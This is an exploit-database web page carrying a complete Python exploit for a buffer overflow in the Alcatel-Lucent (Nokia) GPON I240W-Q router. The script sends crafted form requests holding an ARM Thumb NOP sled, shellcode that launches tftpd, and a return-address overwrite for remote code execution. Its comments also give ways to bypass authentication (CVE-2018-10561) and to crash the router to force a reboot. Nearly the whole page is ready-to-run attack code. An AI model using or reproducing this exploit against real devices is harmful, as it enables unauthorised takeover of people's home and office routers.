Registeralcatellucent (nokia) gpon i240wq buffer overflow
▸▸▸ Exploit & Vulnerability >> remote exploit & hardware vulnerability
Online Vulnerability Scanner Tools
Code...
#!/usr/bin/python3 import argparse import requests import urllib.parse import binascii import re def run(target): """ Execute exploitation """ # We're using CVE-2018-10561 and/or it's extension in order to exploit this # Authenticated RCE in usb_Form method of GPON ONT. We can also exploit this # issue after successful authentication: "useradmin" permission is enough # # IP Spoofing. Perspective option here too # # Step 1. Just a request to adjust stack for the exploit to work # # POST /GponForm/device_Form?script/ HTTP/1.1 # Host: 192.168.1.1 # User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 # Accept-Language: en-US,en;q=0.5 # Accept-Encoding: gzip, deflate # Referer: http://192.168.1.1/device.html # Content-Type: application/x-www-form-urlencoded # Content-Length: 55 # Connection: close # Upgrade-Insecure-Requests: 1 # # XWebPageName=device&admin_action=usb_enable&usbenable=1 headers = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language':'en-US,en;q=0.5', 'Accept-Encoding':'gzip, deflate', 'Referer':'http://192.168.1.1/device.html', 'Content-Type':'application/x-www-form-urlencoded', 'Connection': 'close', 'Upgrade-Insecure-Requests':'1', 'Cookie':'hibext_instdsigdipv2=1; _ga=GA1.1.1081495671.1538484678'} payload = {'XWebPageName':'device', 'admin_action':'usb_enable', 'usbenable':1} try: requests.post(urllib.parse.urljoin(target, '/GponForm/device_Form?script/'), data=payload, verify=False, headers=headers, timeout=2) except: pass # Step 2. Actual Exploitation # # POST /GponForm/usb_Form?script/ HTTP/1.1 # Host: 192.168.1.1 # User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 # Accept-Language: en-US,en;q=0.5 # Accept-Encoding: gzip, deflate # Referer: http://192.168.1.1/usb.html # Content-Type: application/x-www-form-urlencoded # Content-Length: 639 # Connection: close # Upgrade-Insecure-Requests: 1 # XWebPageName=usb&ftpenable=0&url=ftp%3A%2F%2F&urlbody=&mode=ftp_anonymous&webdir=&port=21&clientusername=BBBBEBBBBDDDDBBBBBCCCCBBBBAAAABBBBAABBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAABBBBBBEEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&clientpassword=&ftpdir=&ftpdirname=undefined&clientaction=download&iptv_wan=2&mvlan=-1 # Weaponizing request: # mov r8, r8 ; NOP for ARM Thumb nop = "\xc0\x46" # .section .text # .global _start # # _start: # .code 32 # add r3, pc, #1 # bx r3 # # ; We've removed prev commands as processor is already in Thumb mode # # .code 16 # add r0, pc, #8 # eor r1, r1, r1 # eor r2, r2, r2 # strb r2, [r0, #10] ; Changing last char of command to \x00 in runtime # mov r7, #11 # svc #1 # .ascii "/bin/tftpdX" shellcode = "\x02\xa0\x49\x40\x52\x40\x82\x72\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x74\x66\x74\x70\x64\x58" # Overwritting only 3 bytes in order to get \x00 in 4th pc = "\xe1\x8c\x03" exploit = "A" + 197 * nop + shellcode + 26*"A" + pc payload = {'XWebPageName':'usb', 'ftpenable':'0', 'url':'ftp%3A%2F%2F', 'urlbody':'', 'mode':'ftp_anonymous', 'webdir':'', 'port':21, 'clientusername':exploit, 'clientpassword':'', 'ftpdir':'', 'ftpdirname':'undefined', 'clientaction':'download', 'iptv_wan':'2', 'mvlan':'-1'} headers = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language':'en-US,en;q=0.5', 'Accept-Encoding':'gzip, deflate', 'Referer':'http://192.168.1.1/usb.html', 'Content-Type':'application/x-www-form-urlencoded', 'Connection': 'close', 'Upgrade-Insecure-Requests':'1', 'Cookie':'hibext_instdsigdipv2=1; _ga=GA1.1.1081495671.1538484678'} # Prevent requests from URL encoding payload_str = "&".join("%s=%s" % (k,v) for k,v in payload.items()) try: requests.post(urllib.parse.urljoin(target, '/GponForm/usb_Form?script/'), data=payload_str, headers=headers, verify=False, timeout=2) except: pass print("The payload has been sent. Please check UDP 69 port of router for the tftpd service"); print("You can use something like: sudo nmap -sU -p 69 192.168.1.1"); def main(): """ Parse command line arguments and start exploit """ # # Exploit should be executed after reboot. You can easily achive this in 3 ways: # 1) Send some request to crash WebMgr (any DoS based on BoF). Router will be rebooted after that # 2) Use CVE-2018-10561 to bypass authentication and trigger reboot from "device.html" page # 3) Repeat this exploit at least twice ;) # any of those will work! # parser = argparse.ArgumentParser( add_help=False, formatter_class=argparse.RawDescriptionHelpFormatter, epilog="Examples: %(prog)s -t http://192.168.1.1/") # Adds arguments to help menu parser.add_argument("-h", action="help", help="Print this help message then exit") parser.add_argument("-t", dest="target", required="yes", help="Target URL address like: https://localhost:443/") # Assigns the arguments to various variables args = parser.parse_args() run(args.target) # # Main # if __name__ == "__main__": main()
Alcatellucent (nokia) gpon i240wq buffer overflow Vulnerability / Exploit Source : Alcatellucent (nokia) gpon i240wq buffer overflow
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes